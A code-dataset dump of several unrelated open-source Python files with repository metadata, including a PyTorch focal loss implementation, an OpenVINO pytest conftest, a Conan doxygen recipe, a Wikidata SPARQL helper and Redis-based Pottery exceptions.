self.cbxFlow.setChecked(section.flow_stats)
self.cbxInput.setChecked(section.input)
self.cbxAverage.setChecked(section.averages)
# add nodes to list 1
self.listWidget.setSelectionMode(QAbstractItemView.ExtendedSelection)
self.listWidget.clear()
counter = -1
for node_group in project.nodes_groups():
if node_group and node_group.value:
for node in node_group.value:
self.listWidget.addItem(node.name)
counter += 1
if node.name in section.nodes:
self.listWidget.item(counter).setSelected(True)
if section.nodes[0] == 'ALL':
self.listWidget.selectAll()
# add links to list 2
self.listWidget_2.setSelectionMode(QAbstractItemView.ExtendedSelection)
self.listWidget_2.clear()
counter = -1
for link in project.all_links():
self.listWidget_2.addItem(link.name)
counter += 1
if link.name in section.links:
self.listWidget_2.item(counter).setSelected(True)
if section.links[0] == 'ALL':
self.listWidget_2.selectAll()
# add subcatchments to list 3
self.listWidget_3.setSelectionMode(QAbstractItemView.ExtendedSelection)
self.listWidget_3.clear()
counter = -1
for subcatchment in project.subcatchments.value:
self.listWidget_3.addItem(subcatchment.name)
counter += 1
if subcatchment.name in section.subcatchments:
self.listWidget_3.item(counter).setSelected(True)
if section.subcatchments[0] == 'ALL':
self.listWidget_3.selectAll()
def cmdOK_Clicked(self):
section = self._main_form.project.find_section("REPORT")
orig_continuity = section.continuity
orig_controls = section.controls
orig_flow_stats = section.flow_stats
orig_input = section.input
orig_nodes = section.nodes
orig_averages = section.averages
section.continuity = self.cbxContinuity.isChecked()
section.controls = self.cbxControls.isChecked()
section.flow_stats = self.cbxFlow.isChecked()
section.input = self.cbxInput.isChecked()
section.averages = self.cbxAverage.isChecked()
# if none selected NONE, ALL, or list
if self.listWidget.selectedItems().__len__() == self.listWidget.count():
section.nodes = ['ALL']
elif self.listWidget.selectedItems().__len__() == 0:
section.nodes = ['NONE']
else:
section.nodes = []
for item in self.listWidget.selectedItems():
section.nodes.append(str(item.text()))
if orig_continuity != section.continuity or \
orig_controls != section.controls or \
orig_flow_stats != section.flow_stats or \
orig_input != section.input or \
orig_nodes != section.nodes or \
orig_averages != section.averages:
self._main_form.mark_project_as_unsaved()
self._main_form.program_settings.setValue("Geometry/" + "frmReportOptions_geometry", self.saveGeometry())
self._main_form.program_settings.setValue("Geometry/" + "frmReportOptions_state", self.saveState())
self.close()
def cmdCancel_Clicked(self):
self.close()
def cmdNodeAll_Clicked(self):
self.listWidget.selectAll()
def cmdNodeNone_Clicked(self):
self.listWidget.clearSelection()
def cmdLinksAll_Clicked(self):
self.listWidget_2.selectAll()
def cmdLinksNone_Clicked(self):
self.listWidget_2.clearSelection()
def cmdSubcatchmentsAll_Clicked(self):
self.listWidget_3.selectAll()
def cmdSubcatchmentsNone_Clicked(self):
self.listWidget_3.clearSelection()
|
c2aec272e610cb8d76e5bfe4aa7459e125427168
|
0f7022644a8c708cce420f1d95cc82f254d49c3a
|
/focal_loss.py
|
ff21d89af42d3f4506cb508e4590f7dd8f46a806
|
[
"MIT"
] |
permissive
|
AdeelH/pytorch-multi-class-focal-loss
|
b6b597e0165c73aeab730e67127748f6aaaa2abe
|
2477bf68ac61d2d2e5e044c63f70b156073c5ffd
|
refs/heads/master
| 2023-04-12T10:58:14.782880
| 2022-10-14T18:38:26
| 2022-10-14T18:38:26
| 292,520,399
| 185
| 22
|
MIT
| 2022-10-14T18:38:27
| 2020-09-03T09:08:36
|
Python
|
UTF-8
|
Python
| false
| false
| 4,421
|
py
|
focal_loss.py
|
from typing import Optional, Sequence
import torch
from torch import Tensor
from torch import nn
from torch.nn import functional as F
class FocalLoss(nn.Module):
""" Focal Loss, as described in https://arxiv.org/abs/1708.02002.
It is essentially an enhancement to cross entropy loss and is
useful for classification tasks when there is a large class imbalance.
x is expected to contain raw, unnormalized scores for each class.
y is expected to contain class labels.
Shape:
- x: (batch_size, C) or (batch_size, C, d1, d2, ..., dK), K > 0.
- y: (batch_size,) or (batch_size, d1, d2, ..., dK), K > 0.
"""
def __init__(self,
alpha: Optional[Tensor] = None,
gamma: float = 0.,
reduction: str = 'mean',
ignore_index: int = -100):
"""Constructor.
Args:
alpha (Tensor, optional): Weights for each class. Defaults to None.
gamma (float, optional): A constant, as described in the paper.
Defaults to 0.
reduction (str, optional): 'mean', 'sum' or 'none'.
Defaults to 'mean'.
ignore_index (int, optional): class label to ignore.
Defaults to -100.
"""
if reduction not in ('mean', 'sum', 'none'):
raise ValueError(
'Reduction must be one of: "mean", "sum", "none".')
super().__init__()
self.alpha = alpha
self.gamma = gamma
self.ignore_index = ignore_index
self.reduction = reduction
self.nll_loss = nn.NLLLoss(
weight=alpha, reduction='none', ignore_index=ignore_index)
def __repr__(self):
arg_keys = ['alpha', 'gamma', 'ignore_index', 'reduction']
arg_vals = [self.__dict__[k] for k in arg_keys]
arg_strs = [f'{k}={v!r}' for k, v in zip(arg_keys, arg_vals)]
arg_str = ', '.join(arg_strs)
return f'{type(self).__name__}({arg_str})'
def forward(self, x: Tensor, y: Tensor) -> Tensor:
if x.ndim > 2:
# (N, C, d1, d2, ..., dK) --> (N * d1 * ... * dK, C)
c = x.shape[1]
x = x.permute(0, *range(2, x.ndim), 1).reshape(-1, c)
# (N, d1, d2, ..., dK) --> (N * d1 * ... * dK,)
y = y.view(-1)
unignored_mask = y != self.ignore_index
y = y[unignored_mask]
if len(y) == 0:
return torch.tensor(0.)
x = x[unignored_mask]
# compute weighted cross entropy term: -alpha * log(pt)
# (alpha is already part of self.nll_loss)
log_p = F.log_softmax(x, dim=-1)
ce = self.nll_loss(log_p, y)
# get true class column from each row
all_rows = torch.arange(len(x))
log_pt = log_p[all_rows, y]
# compute focal term: (1 - pt)^gamma
pt = log_pt.exp()
focal_term = (1 - pt)**self.gamma
# the full loss: -alpha * ((1 - pt)^gamma) * log(pt)
loss = focal_term * ce
if self.reduction == 'mean':
loss = loss.mean()
elif self.reduction == 'sum':
loss = loss.sum()
return loss
def focal_loss(alpha: Optional[Sequence] = None,
gamma: float = 0.,
reduction: str = 'mean',
ignore_index: int = -100,
device='cpu',
dtype=torch.float32) -> FocalLoss:
"""Factory function for FocalLoss.
Args:
alpha (Sequence, optional): Weights for each class. Will be converted
to a Tensor if not None. Defaults to None.
gamma (float, optional): A constant, as described in the paper.
Defaults to 0.
reduction (str, optional): 'mean', 'sum' or 'none'.
Defaults to 'mean'.
ignore_index (int, optional): class label to ignore.
Defaults to -100.
device (str, optional): Device to move alpha to. Defaults to 'cpu'.
dtype (torch.dtype, optional): dtype to cast alpha to.
Defaults to torch.float32.
Returns:
A FocalLoss object
"""
if alpha is not None:
if not isinstance(alpha, Tensor):
alpha = torch.tensor(alpha)
alpha = alpha.to(device=device, dtype=dtype)
fl = FocalLoss(
alpha=alpha,
gamma=gamma,
reduction=reduction,
ignore_index=ignore_index)
return fl
|
df255115b0a159837d3746b4c9c8cae5d52024dc
|
2ae0b8d95d439ccfd55ea7933ad4a2994ad0f6c5
|
/tests/time_tests/test_runner/conftest.py
|
48c9352b84d4449263d0535a75d747aa48dfbee6
|
[
"Apache-2.0"
] |
permissive
|
openvinotoolkit/openvino
|
38ea745a247887a4e14580dbc9fc68005e2149f9
|
e4bed7a31c9f00d8afbfcabee3f64f55496ae56a
|
refs/heads/master
| 2023-08-18T03:47:44.572979
| 2023-08-17T21:24:59
| 2023-08-17T21:24:59
| 153,097,643
| 3,953
| 1,492
|
Apache-2.0
| 2023-09-14T21:42:24
| 2018-10-15T10:54:40
|
C++
|
UTF-8
|
Python
| false
| false
| 13,965
|
py
|
conftest.py
|
# Copyright (C) 2018-2023 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
#
"""
Basic high-level plugin file for pytest.
See [Writing plugins](https://docs.pytest.org/en/latest/writing_plugins.html)
for more information.
This plugin adds the following command-line options:
* `--test_conf` - Path to test configuration file. Used to parametrize tests.
Format: YAML file.
* `--exe` - Path to a timetest binary to execute.
* `--niter` - Number of times to run executable.
"""
import hashlib
import json
import logging
# pylint:disable=import-error
import os
import shutil
import sys
import tempfile
from pathlib import Path
import pytest
import yaml
from jsonschema import validate, ValidationError
# add utils folder to imports
UTILS_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))), "utils")
sys.path.insert(0, str(UTILS_DIR))
from path_utils import check_positive_int
from platform_utils import get_os_name, get_os_version, get_cpu_info
from utils import upload_data, metadata_from_manifest, push_to_db_facade, modify_data_for_push_to_new_db, DB_COLLECTIONS
# -------------------- CLI options --------------------
def pytest_addoption(parser):
"""Specify command-line options for all plugins"""
test_args_parser = parser.getgroup("timetest test run")
test_args_parser.addoption(
"--test_conf",
type=Path,
help="Path to a test config",
default=Path(__file__).parent / "test_config.yml"
)
test_args_parser.addoption(
"--exe",
required=True,
dest="executable",
type=Path,
help="Path to a timetest binary to execute"
)
test_args_parser.addoption(
"--niter",
type=check_positive_int,
help="Number of iterations to run executable and aggregate results",
default=3
)
test_args_parser.addoption(
"--model_cache",
action='store_true',
help="Enable model cache usage",
)
db_args_parser = parser.getgroup("timetest database use")
db_args_parser.addoption(
'--db_submit',
metavar="RUN_ID",
type=str,
help='Submit results to the database. ' \
'`RUN_ID` should be a string uniquely identifying the run' \
' (like Jenkins URL or time)'
)
is_db_used = db_args_parser.parser.parse_known_args(sys.argv).db_submit
db_args_parser.addoption(
'--db_url',
type=str,
required=is_db_used,
help='MongoDB URL in a form "mongodb://server:port"'
)
db_args_parser.addoption(
'--db_collection',
type=str,
required=is_db_used,
help='Collection name in database',
choices=DB_COLLECTIONS
)
db_args_parser.addoption(
'--db_metadata',
type=str,
default=None,
help='Path to JSON-formatted file to extract additional information'
)
db_args_parser.addoption(
'--manifest',
type=Path,
required=is_db_used,
help='Path to build manifest to extract commit information'
)
db_args_parser.addoption(
'--db_api_handler',
type=str,
help='API handler url for push data to database',
default=''
)
@pytest.fixture(scope="session")
def test_conf(request):
"""Fixture function for command-line option."""
return request.config.getoption('test_conf')
@pytest.fixture(scope="session")
def executable(request):
"""Fixture function for command-line option."""
return request.config.getoption('executable')
@pytest.fixture(scope="session")
def niter(request):
"""Fixture function for command-line option."""
return request.config.getoption('niter')
@pytest.fixture(scope="session")
def model_cache(request):
"""Fixture function for command-line option."""
return request.config.getoption('model_cache')
# -------------------- CLI options --------------------
@pytest.fixture(scope="function")
def temp_dir(pytestconfig):
"""Create temporary directory for test purposes.
It will be cleaned up after every test run.
"""
temp_dir = tempfile.TemporaryDirectory()
yield Path(temp_dir.name)
temp_dir.cleanup()
@pytest.fixture(scope="function")
def cl_cache_dir(pytestconfig, instance):
"""Generate directory to save OpenCL cache before test run and clean up after run.
Folder `cl_cache` should be created in a directory where tests were run. In this case
cache will be saved correctly. This behaviour is OS independent.
More: https://github.com/intel/compute-runtime/blob/master/opencl/doc/FAQ.md#how-can-cl_cache-be-enabled
"""
if instance["device"]["name"] == "GPU":
cl_cache_dir = pytestconfig.invocation_dir / "cl_cache"
# if cl_cache generation to a local `cl_cache` folder doesn't work, specify
# `cl_cache_dir` environment variable in an attempt to fix it (Linux specific)
os.environ["cl_cache_dir"] = str(cl_cache_dir)
if cl_cache_dir.exists():
shutil.rmtree(cl_cache_dir)
cl_cache_dir.mkdir()
logging.info(f"cl_cache will be created in {cl_cache_dir}")
yield cl_cache_dir
shutil.rmtree(cl_cache_dir)
else:
yield None
@pytest.fixture(scope="function")
def model_cache_dir(pytestconfig, instance):
"""
Generate directory to IE model cache before test run and clean up after run.
"""
if instance.get("use_model_cache"):
model_cache_dir = pytestconfig.invocation_dir / "models_cache"
if model_cache_dir.exists():
shutil.rmtree(model_cache_dir)
model_cache_dir.mkdir()
logging.info(f"model_cache will be created in {model_cache_dir}")
yield model_cache_dir
shutil.rmtree(model_cache_dir)
else:
yield None
@pytest.fixture(scope="function")
def test_info(request, pytestconfig):
"""Fixture for collecting timetests information.
Current fixture fills in `request` and `pytestconfig` global
fixtures with timetests information which will be used for
internal purposes.
"""
setattr(request.node._request, "test_info", {"results": {},
"raw_results": {},
"db_info": {}})
yield request.node._request.test_info
@pytest.fixture(scope="function")
def validate_test_case(request, test_info):
"""Fixture for validating test case on correctness.
Fixture checks current test case contains all fields required for
a correct work.
"""
schema = """
{
"type": "object",
"properties": {
"device": {
"type": "object",
"properties": {
"name": {"type": "string"}
},
"required": ["name"]
},
"model": {
"type": "object",
"properties": {
"path": {"type": "string"}
},
"required": ["path"]
}
},
"required": ["device", "model"],
"additionalProperties": true
}
"""
schema = json.loads(schema)
try:
validate(instance=request.node.funcargs["instance"], schema=schema)
except ValidationError:
request.config.option.db_submit = False
raise
yield
@pytest.fixture(scope="function")
def prepare_db_info(request, test_info, executable, niter, manifest_metadata):
"""Fixture for preparing and validating data to submit to a database.
Fixture prepares data and metadata to submit to a database. One of the steps
is parsing of build information from build manifest. After preparation,
it checks if data contains required properties.
"""
FIELDS_FOR_ID = ['run_id', 'timetest', 'model', 'device', 'niter']
run_id = request.config.getoption("db_submit")
if not run_id:
yield
return
# add db_metadata
db_meta_path = request.config.getoption("db_metadata")
if db_meta_path:
with open(db_meta_path, "r") as db_meta_f:
test_info["db_info"].update(json.load(db_meta_f))
# add model cache status
test_info["db_info"].update({"model_cache": request.config.getoption("model_cache")})
# add test info
info = {
# results will be added immediately before uploading to DB in `pytest_runtest_makereport`
"run_id": run_id,
"timetest": str(executable.stem),
"model": request.node.funcargs["instance"]["model"],
"device": request.node.funcargs["instance"]["device"],
"niter": niter,
"test_name": request.node.name,
"os": "_".join([str(item) for item in [get_os_name(), *get_os_version()]])
}
info['_id'] = hashlib.sha256(
''.join([str(info[key]) for key in FIELDS_FOR_ID]).encode()).hexdigest()
test_info["db_info"].update(info)
# add manifest metadata
test_info["db_info"].update(manifest_metadata)
# validate db_info
schema = """
{
"type": "object",
"properties": {
"device": {
"type": "object",
"properties": {
"name": {"type": "string"}
},
"required": ["name"]
},
"model": {
"type": "object",
"properties": {
"path": {"type": "string"},
"name": {"type": "string"},
"precision": {"type": "string"},
"framework": {"type": "string"}
},
"required": ["path", "name", "precision", "framework"]
},
"run_id": {"type": "string"},
"timetest": {"type": "string"},
"niter": {"type": "integer"},
"test_name": {"type": "string"},
"results": {"type": "object"},
"os": {"type": "string"},
"_id": {"type": "string"}
},
"required": ["device", "model", "run_id", "timetest", "niter", "test_name", "os", "_id"],
"additionalProperties": true
}
"""
schema = json.loads(schema)
try:
validate(instance=test_info["db_info"], schema=schema)
except ValidationError:
request.config.option.db_submit = False
raise
yield
@pytest.fixture(scope="session", autouse=True)
def manifest_metadata(request):
"""Fixture function for command-line option."""
run_id = request.config.getoption("db_submit")
if not run_id:
yield
return
manifest_meta = metadata_from_manifest(request.config.getoption("manifest"))
schema = """
{
"type": "object",
"properties": {
"product_type": {"type": "string"},
"repo_url": {"type": "string"},
"commit_sha": {"type": "string"},
"commit_date": {"type": "string"},
"branch": {"type": "string"},
"target_branch": {"type": "string"},
"version": {"type": "string"}
},
"required": ["product_type", "repo_url", "commit_sha", "commit_date", "branch", "target_branch", "version"],
"additionalProperties": false
}
"""
schema = json.loads(schema)
try:
validate(instance=manifest_meta, schema=schema)
except ValidationError:
request.config.option.db_submit = False
raise
yield manifest_meta
def pytest_generate_tests(metafunc):
"""Pytest hook for test generation.
Generate parameterized tests from discovered modules and test config
parameters.
"""
with open(metafunc.config.getoption('test_conf'), "r") as file:
test_cases = yaml.safe_load(file)
if test_cases:
metafunc.parametrize("instance", test_cases)
def pytest_make_parametrize_id(config, val, argname):
"""Pytest hook for user-friendly test name representation"""
def get_dict_values(d):
"""Unwrap dictionary to get all values of nested dictionaries"""
if isinstance(d, dict):
for v in d.values():
yield from get_dict_values(v)
else:
yield d
keys = ["device", "model"]
values = {key: val[key] for key in keys}
values = list(get_dict_values(values))
return "-".join(["_".join([key, str(val)]) for key, val in zip(keys, values)])
@pytest.mark.hookwrapper
def pytest_runtest_makereport(item, call):
"""Pytest hook for report preparation.
Submit tests' data to a database.
"""
run_id = item.config.getoption("db_submit")
if not run_id:
yield
return
data = item._request.test_info["db_info"].copy()
data["results"] = item._request.test_info["results"].copy()
data["raw_results"] = item._request.test_info["raw_results"].copy()
data["cpu_info"] = get_cpu_info()
data["status"] = "not_finished"
data["error_msg"] = ""
report = (yield).get_result()
if call.when in ["setup", "call"]:
if call.when == "call":
if not report.passed:
data["status"] = "failed"
data["error_msg"] = report.longrepr.reprcrash.message
else:
data["status"] = "passed"
db_url = item.config.getoption("db_url")
db_collection = item.config.getoption("db_collection")
logging.info(f"Upload data to {db_url}/{'timetests'}.{db_collection}. "
f"Data: {data}")
upload_data(data, db_url, 'timetests', db_collection)
db_api_handler = item.config.getoption("db_api_handler")
if db_api_handler and call.when == "call":
new_format_records = modify_data_for_push_to_new_db(data)
new_format_records['data'][0]["log"] = item._request.test_info["logs"]
push_to_db_facade(new_format_records, db_api_handler)
|
86065e08b069917aac018f34f6f29bfa170aebdb
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/response/AlipayMarketingActivityGoodsBatchqueryResponse.py
|
aeb52ef8f9649686120d0d1c26958bd00b88eac7
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 2,884
|
py
|
AlipayMarketingActivityGoodsBatchqueryResponse.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.AppItemInfo import AppItemInfo
from alipay.aop.api.domain.ActivityGoodsInfo import ActivityGoodsInfo
class AlipayMarketingActivityGoodsBatchqueryResponse(AlipayResponse):
def __init__(self):
super(AlipayMarketingActivityGoodsBatchqueryResponse, self).__init__()
self._activity_id = None
self._app_item_infos = None
self._goods_infos = None
self._page_num = None
self._page_size = None
self._total_size = None
@property
def activity_id(self):
return self._activity_id
@activity_id.setter
def activity_id(self, value):
self._activity_id = value
@property
def app_item_infos(self):
return self._app_item_infos
@app_item_infos.setter
def app_item_infos(self, value):
if isinstance(value, list):
self._app_item_infos = list()
for i in value:
if isinstance(i, AppItemInfo):
self._app_item_infos.append(i)
else:
self._app_item_infos.append(AppItemInfo.from_alipay_dict(i))
@property
def goods_infos(self):
return self._goods_infos
@goods_infos.setter
def goods_infos(self, value):
if isinstance(value, list):
self._goods_infos = list()
for i in value:
if isinstance(i, ActivityGoodsInfo):
self._goods_infos.append(i)
else:
self._goods_infos.append(ActivityGoodsInfo.from_alipay_dict(i))
@property
def page_num(self):
return self._page_num
@page_num.setter
def page_num(self, value):
self._page_num = value
@property
def page_size(self):
return self._page_size
@page_size.setter
def page_size(self, value):
self._page_size = value
@property
def total_size(self):
return self._total_size
@total_size.setter
def total_size(self, value):
self._total_size = value
def parse_response_content(self, response_content):
response = super(AlipayMarketingActivityGoodsBatchqueryResponse, self).parse_response_content(response_content)
if 'activity_id' in response:
self.activity_id = response['activity_id']
if 'app_item_infos' in response:
self.app_item_infos = response['app_item_infos']
if 'goods_infos' in response:
self.goods_infos = response['goods_infos']
if 'page_num' in response:
self.page_num = response['page_num']
if 'page_size' in response:
self.page_size = response['page_size']
if 'total_size' in response:
self.total_size = response['total_size']
|
542aac17b2ee3550916c5560aefdad6dc4375ae9
|
549270020f6c8724e2ef1b12e38d11b025579f8d
|
/recipes/doxygen/all/conanfile.py
|
7b30ce53b00608a1a3fb920201e3adb4c4f15bce
|
[
"MIT"
] |
permissive
|
conan-io/conan-center-index
|
1bcec065ccd65aa38b1fed93fbd94d9d5fe6bc43
|
3b17e69bb4e5601a850b6e006e44775e690bac33
|
refs/heads/master
| 2023-08-31T11:34:45.403978
| 2023-08-31T11:13:23
| 2023-08-31T11:13:23
| 204,671,232
| 844
| 1,820
|
MIT
| 2023-09-14T21:22:42
| 2019-08-27T09:43:58
|
Python
|
UTF-8
|
Python
| false
| false
| 3,743
|
py
|
conanfile.py
|
from conan import ConanFile
from conan.errors import ConanInvalidConfiguration
from conan.tools.cmake import CMake, CMakeDeps, CMakeToolchain, cmake_layout
from conan.tools.files import apply_conandata_patches, copy, export_conandata_patches, get
from conan.tools.microsoft import check_min_vs, is_msvc_static_runtime
from conan.tools.scm import Version
import os
required_conan_version = ">=1.52.0"
class DoxygenConan(ConanFile):
name = "doxygen"
description = "A documentation system for C++, C, Java, IDL and PHP --- Note: Dot is disabled in this package"
topics = ("installer", "devtool", "documentation")
homepage = "https://github.com/doxygen/doxygen"
license = "GPL-2.0-or-later"
url = "https://github.com/conan-io/conan-center-index"
package_type = "application"
settings = "os", "arch", "compiler", "build_type"
options = {
"enable_parse": [True, False],
"enable_search": [True, False],
}
default_options = {
"enable_parse": True,
"enable_search": True,
}
@property
def _settings_build(self):
return getattr(self, "settings_build", self.settings)
@property
def _minimum_compiler_version(self):
if Version(self.version) <= "1.9.1":
return {
"gcc": "5",
}
return {
"gcc": "7", # https://gcc.gnu.org/bugzilla/show_bug.cgi?id=66297
"Visual Studio": "15",
"msvc": "191",
}
def export_sources(self):
export_conandata_patches(self)
def layout(self):
cmake_layout(self, src_folder="src")
def requirements(self):
if self.options.enable_search:
self.requires("xapian-core/1.4.19")
self.requires("zlib/1.2.13")
def package_id(self):
del self.info.settings.compiler
def compatibility(self):
return [{"settings": [("build_type", "Release")]}]
def validate(self):
minimum_compiler_version = self._minimum_compiler_version.get(str(self.settings.compiler))
if minimum_compiler_version and Version(self.settings.compiler.version) < minimum_compiler_version:
raise ConanInvalidConfiguration(f"Compiler version too old. At least {minimum_compiler_version} is required.")
if Version(self.version) == "1.8.18":
check_min_vs(self, "191")
def build_requirements(self):
if self._settings_build.os == "Windows":
self.tool_requires("winflexbison/2.5.24")
else:
self.tool_requires("flex/2.6.4")
self.tool_requires("bison/3.8.2")
def source(self):
get(self, **self.conan_data["sources"][self.version], strip_root=True)
def generate(self):
tc = CMakeToolchain(self)
tc.variables["build_parse"] = self.options.enable_parse
tc.variables["build_search"] = self.options.enable_search
tc.variables["use_libc++"] = self.settings.compiler.get_safe("libcxx") == "libc++"
tc.variables["win_static"] = is_msvc_static_runtime(self)
tc.generate()
deps = CMakeDeps(self)
deps.generate()
def build(self):
apply_conandata_patches(self)
cmake = CMake(self)
cmake.configure()
cmake.build()
def package(self):
copy(self, "LICENSE", src=self.source_folder, dst=os.path.join(self.package_folder, "licenses"))
cmake = CMake(self)
cmake.install()
def package_info(self):
self.cpp_info.set_property("cmake_find_mode", "none")
self.cpp_info.libdirs = []
self.cpp_info.includedirs = []
# TODO: to remove in conan v2
self.env_info.PATH.append(os.path.join(self.package_folder, "bin"))
|
f68d2595ed6b02afc3a5504a3363e435307b3cb8
|
2142d4023bce901857ce33e9c46919bf78b06779
|
/baselines/EMNLP2019/wikidata.py
|
47a263450bf6d8f95f67a1c766f60cfce8db7add
|
[
"MIT"
] |
permissive
|
diffbot/knowledge-net
|
01281e75ba24a68c22a715b39ba93e8febc4b158
|
abc4ed3ebb88bfde8c1f02709371324ae6347ba0
|
refs/heads/master
| 2021-06-10T16:22:20.118879
| 2020-10-01T21:49:40
| 2020-10-01T21:49:40
| 179,616,035
| 260
| 38
|
MIT
| 2021-05-21T16:01:26
| 2019-04-05T03:55:03
|
Python
|
UTF-8
|
Python
| false
| false
| 2,582
|
py
|
wikidata.py
|
import requests
import os
from sqlitedict import SqliteDict
import time
import urllib
if not os.path.exists("./tmp"):
os.makedirs("./tmp")
db = SqliteDict(os.path.join('./tmp','properties_subject.db'), autocommit=True)
from SPARQLWrapper import SPARQLWrapper, JSON
ENDPOINT = 'https://query.wikidata.org/sparql'
def get_query_from_subjects_only(subject):
query = """
SELECT ?s ?relation ?o
WHERE {
{BIND(wd:%s AS ?s). ?s ?relation ?o}
}""" % (subject)
return query
def is_valid_or_convert(uri):
if uri == "":
return None
if uri[-1] == "/":
uri = uri[:-1]
uri = uri.split("/")[-1]
if uri[0] == "Q":
return uri
else:
return None
def request(subject, set_objects):
try:
triples = []
wikidata_response = db.get(subject, None)
if not wikidata_response is None:
for t in wikidata_response.split("\n"):
subject = t.split("\t")[0]
property = t.split("\t")[1]
object = t.split("\t")[2]
if object in set_objects:
triples.append((subject, property, object))
else:
sparql = SPARQLWrapper(ENDPOINT)
query = get_query_from_subjects_only(subject)
sparql.setQuery(query)
sparql.setReturnFormat(JSON)
data = sparql.query().convert()
triples_2_store = ""
for p in data["results"]["bindings"]:
object = p["o"]["value"].split("/")[-1]
subject = p["s"]["value"].split("/")[-1]
property = p["relation"]["value"].split("/")[-1]
triples_2_store = triples_2_store + subject + "\t" + property + "\t" + object + "\n"
if object in set_objects:
triples.append((subject, property, object))
if triples_2_store != "":
db[subject] = triples_2_store.rstrip("\n")
return triples
except urllib.error.HTTPError:
time.sleep(1)
return request(subject, set_objects)
def get_properties(list_first_uri, list_second_uri):
list_first_uri_clean = [is_valid_or_convert(x) for x in list_first_uri if is_valid_or_convert(x) != None]
list_second_uri_clean = [is_valid_or_convert(x) for x in list_second_uri if is_valid_or_convert(x) != None]
propertiesBySubObj = {}
cont = 0
for subject in list_first_uri_clean:
cont+=1
triples = request(subject, set(list_second_uri_clean))
for t in triples:
entry = str(t[0]) + "-" + str(t[2])
if not entry in propertiesBySubObj:
propertiesBySubObj[entry] = set()
propertiesBySubObj[entry].add(t[1])
return propertiesBySubObj
if __name__ == "__main__":
print(get_properties(["Q76", "Q242951"], ["Q1860"]))
|
9cc3ab9fcc5821db060a3df7954fbf342b1e0a1f
|
8a1fdebb4527d7ef33d57251919f3b9e0e9b5b44
|
/pottery/exceptions.py
|
d76c03a88ba428f7b92332b36594b7dac1fb885a
|
[
"Apache-2.0"
] |
permissive
|
brainix/pottery
|
5cebfeea72bd8c1b42572095f399145420de4d86
|
c7be6f1f25c5404a460b676cc60d4e6a931f8ee7
|
refs/heads/master
| 2022-12-15T16:13:12.107374
| 2022-05-02T09:16:01
| 2022-05-02T09:16:01
| 37,182,318
| 872
| 49
|
Apache-2.0
| 2022-12-08T12:37:20
| 2015-06-10T07:30:43
|
Python
|
UTF-8
|
Python
| false
| false
| 3,021
|
py
|
exceptions.py
|
# --------------------------------------------------------------------------- #
# exceptions.py #
# #
# Copyright © 2015-2022, Rajiv Bakulesh Shah, original author. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at: #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# --------------------------------------------------------------------------- #
# TODO: When we drop support for Python 3.9, remove the following import. We
# only need it for X | Y union type annotations as of 2022-01-29.
from __future__ import annotations
from dataclasses import dataclass
from queue import Empty
from typing import Iterable
from redis import Redis
from redis import RedisError
@dataclass
class PotteryError(Exception):
'Base exception class for Pottery containers.'
redis: Redis
key: str | None = None
class KeyExistsError(PotteryError):
'Initializing a container on a Redis key that already exists.'
class RandomKeyError(PotteryError, RuntimeError):
"Can't create a random Redis key; all of our attempts already exist."
class QueueEmptyError(PotteryError, Empty):
'Non-blocking .get() or .get_nowait() called on RedisQueue which is empty.'
@dataclass
class PrimitiveError(Exception):
'Base exception class for distributed primitives.'
key: str
masters: Iterable[Redis]
redis_errors: Iterable[RedisError] = tuple()
class QuorumNotAchieved(PrimitiveError, RuntimeError):
'Consensus-based algorithm could not achieve quorum.'
class TooManyExtensions(PrimitiveError, RuntimeError):
'Redlock has been extended too many times.'
class ExtendUnlockedLock(PrimitiveError, RuntimeError):
'Attempting to extend an unlocked Redlock.'
class ReleaseUnlockedLock(PrimitiveError, RuntimeError):
'Attempting to release an unlocked Redlock.'
class QuorumIsImpossible(PrimitiveError, RuntimeError):
'Too many Redis masters threw RedisErrors; quorum can not be achieved.'
class PotteryWarning(Warning):
'Base warning class for Pottery containers.'
class InefficientAccessWarning(PotteryWarning):
'Doing an O(n) Redis operation.'
|
5303f29c2293fb4bf375445a6bb31740ddfa2d53
|
5917ffcb780cfcfe4e2b87b11fca1f68f387b239
|
/plenum/test/monitoring/test_post_monitoring_stats.py
|
00f6281743edf76eb266eb4ddfcee551b4041d7e
|
[
"Apache-2.0"
] |
permissive
|
hyperledger/indy-plenum
|
6ff9f705af80dfa28d4cb92743683f78bb937aa3
|
698b9500ad3a7a15993af72a1c35a406c5673262
|
refs/heads/main
| 2023-08-29T01:32:26.384729
| 2023-06-20T16:42:11
| 2023-06-20T16:42:11
| 51,585,028
| 171
| 420
|
Apache-2.0
| 2023-06-20T16:42:14
| 2016-02-12T12:03:16
|
Python
|
UTF-8
|
Python
| false
| false
| 2,518
|
py
|
test_post_monitoring_stats.py
|
import pytest
from plenum.server.monitor import Monitor
from plenum.test.helper import sdk_send_random_and_check
from plenum.test.node_catchup.helper import ensure_all_nodes_have_same_data
WIND_SIZE = 5
MIN_CNT = 2
@pytest.fixture(scope='module')
def tconf(tconf):
old_val = tconf.Max3PCBatchSize
old_throughput_measurement_params = tconf.throughput_measurement_params
tconf.Max3PCBatchSize = 1
tconf.throughput_measurement_params = {
'window_size': WIND_SIZE,
'min_cnt': MIN_CNT
}
yield tconf
tconf.Max3PCBatchSize = old_val
tconf.throughput_measurement_params = old_throughput_measurement_params
def testPostingThroughput(postingStatsEnabled,
decreasedMonitoringTimeouts,
looper,
txnPoolNodeSet,
sdk_wallet_client, sdk_pool_handle):
